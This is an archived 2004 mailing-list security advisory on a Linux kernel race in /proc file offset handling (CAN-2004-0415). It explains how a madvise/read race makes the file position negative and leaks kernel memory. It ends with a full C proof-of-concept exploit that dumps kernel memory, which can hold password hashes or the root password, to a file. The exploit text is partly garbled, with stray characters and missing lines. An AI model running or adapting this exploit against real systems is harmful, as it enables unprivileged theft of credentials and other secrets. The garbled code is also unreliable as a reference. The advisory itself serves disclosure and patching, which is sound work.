[VulnWatch] Linux kernel file offset pointer races

From: Paul Starzetz (ihaquer_at_isec.pl)
Date: 08/04/04

  • Next message: CORE Security Technologies Advisories: "[VulnWatch] CORE-2004-0705: Vulnerabilities in PuTTY and PSCP"
    Date: Wed, 4 Aug 2004 12:22:42 +0200 (CEST)
    To: bugtraq@securityfocus.com, <vulnwatch@vulnwatch.org>, <full-disclosure@lists.netsys.com>

    Hash: SHA1

    Synopsis: Linux kernel file offset pointer handling
    Product: Linux kernel
    Version: 2.4 up to to and including 2.4.26, 2.6 up to to and
               including 2.6.7
    Vendor: http://www.kernel.org/
    URL: http://isec.pl/vulnerabilities/isec-0016-procleaks.txt
    CVE: CAN-2004-0415
    Author: Paul Starzetz <ihaquer@isec.pl>
    Date: Aug 04, 2004


    A critical security vulnerability has been found in the Linux kernel
    code handling 64bit file offset pointers.


    The Linux kernel offers a file handling API to the userland
    applications. Basically a file can be identified by a file name and
    opened through the open(2) system call which in turn returns a file
    descriptor for the kernel file object.

    One of the properties of the file object is something called 'file
    offset' (f_pos member variable of the file object), which is advanced if
    one reads or writtes to the file. It can also by changed through the
    lseek(2) system call and identifies the current writing/reading position
    inside the file image on the media.

    There are two different versions of the file handling API inside recent
    Linux kernels: the old 32 bit and the new (LFS) 64 bit API. We have
    identified numerous places, where invalid conversions from 64 bit sized
    file offsets to 32 bit ones as well as insecure access to the file
    offset member variable take place.

    We have found that most of the /proc entries (like /proc/version) leak
    about one page of unitialized kernel memory and can be exploited to
    obtain sensitive data.

    We have found dozens of places with suspicious or bogus code. One of
    them resides in the MTRR handling code for the i386 architecture:

    static ssize_t mtrr_read(struct file *file, char *buf, size_t len,
                             loff_t *ppos)
    [1] if (*ppos >= ascii_buf_bytes) return 0;
    [2] if (*ppos + len > ascii_buf_bytes) len = ascii_buf_bytes - *ppos;
        if ( copy_to_user (buf, ascii_buffer + *ppos, len) ) return -EFAULT;
    [3] *ppos += len;
        return len;
    } /* End Function mtrr_read */

    It is quite easy to see that since copy_to_user can sleep, the second
    reference to *ppos may use another value. Or in other words, code
    operating on the file->f_pos variable through a pointer must be atomic
    in respect to the current thread. We expect even more troubles in the
    SMP case though.


    In the following we want to concentrate onto the mttr.c code, however we
    think that also other f_pos handling code in the kernel may be

    The idea is to use the blocking property of copy_to_user to advance the
    file->f_pos file offset to be negative allowing us to bypass the two
    checks marked with [1] and [2] in the above code.

    There are two situation where copy_to_user() will sleep if there is no
    page table entry for the corresponding location in the user buffer used
    to receive the data:

    - - the underlying buffer maps a file which is not in the kernel page
    cache yet. The file content must be read from the disk first

    - - the mmap_sem semaphore of the process's VM is in a closed state, that
    is another thread sharing the same VM caused a down_write on the

    We use the second method as follows. One of two threads sharing same VM
    issues a madvise(2) call on a VMA that maps some, sufficiently big file
    setting the madvise flag to WILLNEED. This will issue a down_write on
    the mmap semaphore and schedule a read-ahead request for the mmaped

    Second thread issues in the mean time a read on the /proc/mtrr file thus
    going for sleep until the first thread returns from the madvise system
    call. The two threads will be woken up in a FIFO manner thus the first
    thread will run as first and can advance the file pointer of the proc
    file to the maximum possible value of 0x7fffffffffffffff while the
    second thread is still waiting in the scheduler queue for CPU (itn the
    non-SMP case).

    After the place marked with [3] has been executed, the file position
    will have a negative value and the checks [1] and [2] can be passed for
    any buffer length supplied, thus leaking the kernel memory from the
    address of ascii_buffer on to the user space.

    We have attached a proof-of-concept exploit code to read portions of
    kernel memory. Another exploit code we have at our disposal can use
    other /proc entries (like /proc/version) to read one page of kernel


    Since no special privileges are required to open the /proc/mtrr file for
    reading any process may exploit the bug to read huge parts of kernel

    The kernel memory dump may include very sensitive information like
    hashed passwords from /etc/shadow or even the root passwort.

    We have found in an experiment that after the root user logged in using
    ssh (in our case it was OpenSSH using PAM), the root passwort was keept
    in kernel memory. This is very suprising since sshd will quickly clean
    (overwrite with zeros) the memory portion used to store the password.
    But the password may have made its way through various kernel paths like
    pipes or sockets.

    Tested and known to be vulnerable kernel versions are all <= 2.4.26 and
    <= 2.6.7. All users are encouraged to patch all vulnerable systems as
    soon as appropriate vendor patches are released. There is no hotfix for
    this vulnerability.


    Paul Starzetz <ihaquer@isec.pl> has identified the vulnerability and
    performed further research. COPYING, DISTRIBUTION, AND MODIFICATION OF


    This document and all the information it contains are provided "as is",
    for educational purposes only, without warranty of any kind, whether
    express or implied.

    The authors reserve the right not to be responsible for the topicality,
    correctness, completeness or quality of the information provided in
    this document. Liability claims regarding damage caused by the use of
    any information provided, including any kind of information which is
    incomplete or incorrect, will therefore be rejected.


     * /proc ppos kernel memory read (semaphore method)
     * gcc -O3 proc_kmem_dump.c -o proc_kmem_dump
     * Copyright (c) 2004 iSEC Security Research. All Rights Reserved.

    #define _GNU_SOURCE

    #include <stdio.h>
    #include <stdlib.h>
    #include <signal.h>
    #include <string.h>
    #include <errno.h>
    #include <unistd.h>
    #include <fcntl.h>
    #include <time.h>
    #include <sched.h>

    #include <sys/socket.h>
    #include <sys/select.h>
    #include <sys/time.h>
    #include <sys/mman.h>

    #include <linux/unistd.h>

    #include <asm/page.h>

    // define machine mem size in MB
    #define MEMSIZE 64

    _syscall5(int, _llseek, uint, fd, ulong, hi, ulong, lo, loff_t *, res,
              uint, wh);

    void fatal(const char *msg)
        if(!errno) {
            fprintf(stderr, "FATAL ERROR: %s0, msg);
        else {


    static int cpid, nc, fd, pfd, r=0, i=0, csize, fsize=1024*1024*MEMSIZE,
               size=PAGE_SIZE, us;
    static volatile int go[2];
    static loff_t off;
    static char *buf=NULL, *file, child_stack[PAGE_SIZE];
    static struct timeval tv1, tv2;
    static struct stat st;

    // child close sempahore & sleep
    int start_child(void *arg)
    // unlock parent & close semaphore
        madvise(file, csize, MADV_DONTNEED);
        madvise(file, csize, MADV_SEQUENTIAL);
        gettimeofday(&tv1, NULL);
        read(pfd, buf, 0);

        r = madvise(file, csize, MADV_WILLNEED);

    // parent blocked on mmap_sem? GOOD!
        if(go[1] == 1 || _llseek(pfd, 0, 0, &off, SEEK_CUR)<0 ) {
            r = _llseek(pfd, 0x7fffffff, 0xffffffff, &off, SEEK_SET);
                if( r == -1 )
            printf("0 Race won!"); fflush(stdout);
        } else {
            printf("0 Race lost %d, use another file!0, go[1]);
            kill(getppid(), SIGTERM);

    return 0;

    void usage(char *name)
        printf("0SAGE: %s <file not in cache>", name);

    int main(int ac, char **av)

    // mmap big file not in cache
        r=stat(av[1], &st);
            fatal("stat file");
        csize = (st.st_size + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);

        fd=open(av[1], O_RDONLY);
            fatal("open file");
        file=mmap(NULL, csize, PROT_READ, MAP_SHARED, fd, 0);
        printf("0 mmaped uncached file at %p - %p", file, file+csize);

        pfd=open("/proc/mtrr", O_RDONLY);

        fd=open("kmem.dat", O_RDWR|O_CREAT|O_TRUNC, 0644);
            fatal("open data");

        r=ftruncate(fd, fsize);

        buf=mmap(NULL, fsize, PROT_READ|PROT_WRITE, MAP_SHARED, fd, 0);
        printf("0 mmaped kernel data file at %p", buf);

    // clone thread wait for child sleep
        nc = nice(0);
        cpid=clone(&start_child, child_stack + sizeof(child_stack)-4,
               CLONE_FILES|CLONE_VM, NULL);
        while(go[0]==0) {

    // try to read & sleep & move fpos to be negative
        gettimeofday(&tv1, NULL);
        go[1] = 1;
        r = read(pfd, buf, size );
        go[1] = 2;
        gettimeofday(&tv2, NULL);
        while(go[0]!=2) {

        us = tv2.tv_sec - tv1.tv_sec;
        us *= 1000000;
        us += (tv2.tv_usec - tv1.tv_usec) ;

        printf("0 READ %d bytes in %d usec", r, us); fflush(stdout);
        r = _llseek(pfd, 0, 0, &off, SEEK_CUR);
        if(r < 0 ) {
            printf("0 SUCCESS, lseek fails, reading kernel mem...0);
            for(;;) {
                r = read(pfd, buf, PAGE_SIZE );
                buf += PAGE_SIZE;
                i++; PAGE %6d", i); fflush(stdout);
            printf("0 done, err=%s", strerror(errno) );

        kill(cpid, 9);

    return 0;

    - --
    Paul Starzetz
    iSEC Security Research

    Version: GnuPG v1.0.7 (GNU/Linux)

    -----END PGP SIGNATURE-----

  • Next message: CORE Security Technologies Advisories: "[VulnWatch] CORE-2004-0705: Vulnerabilities in PuTTY and PSCP"